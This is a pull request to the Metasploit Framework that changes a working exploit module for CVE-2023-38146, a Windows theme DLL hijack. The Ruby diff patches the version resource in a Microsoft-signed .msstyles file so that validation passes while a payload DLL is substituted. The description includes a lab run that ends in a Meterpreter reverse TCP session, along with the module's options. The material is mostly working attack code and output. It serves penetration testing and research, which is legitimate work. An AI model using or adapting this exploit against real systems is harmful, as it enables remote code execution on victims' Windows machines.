### PR TITLE
Patch in the theme version to the MSStyles file

### DIFF
--- a/modules/exploits/windows/fileformat/theme_dll_hijack_cve_2023_38146.rb
+++ b/modules/exploits/windows/fileformat/theme_dll_hijack_cve_2023_38146.rb
@@ -21,7 +21,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'DisclosureDate' => '2023-09-13',
         'Author' => [
           'gabe_k', # Discovery/PoC
-          'bwatters-r7' # msf exploit
+          'bwatters-r7', # msf exploit
+          'Spencer McIntyre' # msf exploit
         ],
         'References' => [
           ['CVE', '2023-38146'],
@@ -39,15 +40,15 @@ class MetasploitModule < Msf::Exploit::Remote
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
           'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS]
-        }
+        },
+        'DefaultOptions' => { 'DisablePayloadHandler' => false }
       )
     )
 
     register_options([
+      OptPath.new('STYLE_FILE', [ true, 'The Microsoft-signed .msstyles file (e.g. aero.msstyles).' '' ], regex: /.*\w*\.msstyles$/),
       OptString.new('STYLE_FILE_NAME', [ true, 'The name of the style file to reference.', '' ], regex: /^\w*(\.msstyles)?$/),
-      OptString.new('THEME_FILE_NAME', [ true, 'The name of the theme file to generate.', 'exploit.theme' ]),
-      OptPath.new('MS_SIGNED_DLL', [true, 'Signed Microsoft DLL to use for passing validation']),
-      OptPath.new('MS_VERSION_FILE', [true, 'Signed Microsoft DLL to use for passing validation'])
+      OptString.new('THEME_FILE_NAME', [ true, 'The name of the theme file to generate.', 'exploit.theme' ])
     ])
 
     deregister_options(
@@ -69,7 +70,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def primer
-    legit_dll = File.binread(datastore['MS_SIGNED_DLL'])
+    legit_dll = File.binread(datastore['STYLE_FILE'])
     payload_dll = generate_payload_dll
     max_length = [payload_dll.length, legit_dll.length].max
     # make sure that the lengths are the same by padding the smaller to the length of the larger
@@ -99,7 +100,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def get_file_contents(client:)
     print_status("Sending file to #{client.peerhost}")
-    File.binread(datastore['MS_VERSION_FILE'])
+    pe_raw = File.binread(datastore['STYLE_FILE'])
+    pe = Rex::PeParsey::Pe.new_from_string(pe_raw)
+    version_offset = pe.rva_to_file_offset(pe.resources['/PACKTHEM_VERSION/0/0'].rva)
+    pe_raw[...version_offset] + [999].pack('v') + pe_raw[(version_offset + 2)...]
   end
 
   def make_theme


### PR DESCRIPTION
This combines the datastore options into one by patching the `PACKTHEM_VERSION` resource value. I used an unmodified `aero.msstyles` file from Windows 11 as the `STYLE_FILE` argument.


```
msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > [*] Server is running. Listening on 192.168.159.128:445
[*] Server started.
[+] exploit.theme stored at /home/smcintyre/.msf4/local/exploit.theme
[*] Received SMB connection from 192.168.159.70
[*] Skipping previously captured hash for .\smcintyre
[*] Sending file to 192.168.159.70
[*] Sending stage (200774 bytes) to 192.168.159.70
[*] Server stopped.
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.70:50006) at 2023-12-19 17:03:36 -0500
msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > show options 

Module options (exploit/windows/fileformat/theme_dll_hijack_cve_2023_38146):

   Name             Current Setting                       Required  Description
   ----             ---------------                       --------  -----------
   SHARE            test                                  no        Share (Default Random)
   SRVHOST          192.168.159.128                       yes       The local host or network interface to listen on. This must be an
                                                                     address on the local machine or 0.0.0.0 to listen on all address
                                                                    es.
   SRVPORT          445                                   yes       The local port to listen on.
   STYLE_FILE       /home/smcintyre/Repositories/themebl  yes       The Microsoft-signed .msstyles file (e.g. aero.msstyles).
                    eed/data/aero.msstyles
   STYLE_FILE_NAME  Aero                                  yes       The name of the style file to reference.
   THEME_FILE_NAME  exploit.theme                         yes       The name of the theme file to generate.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows



View the full module info with the info, or info -d command.

```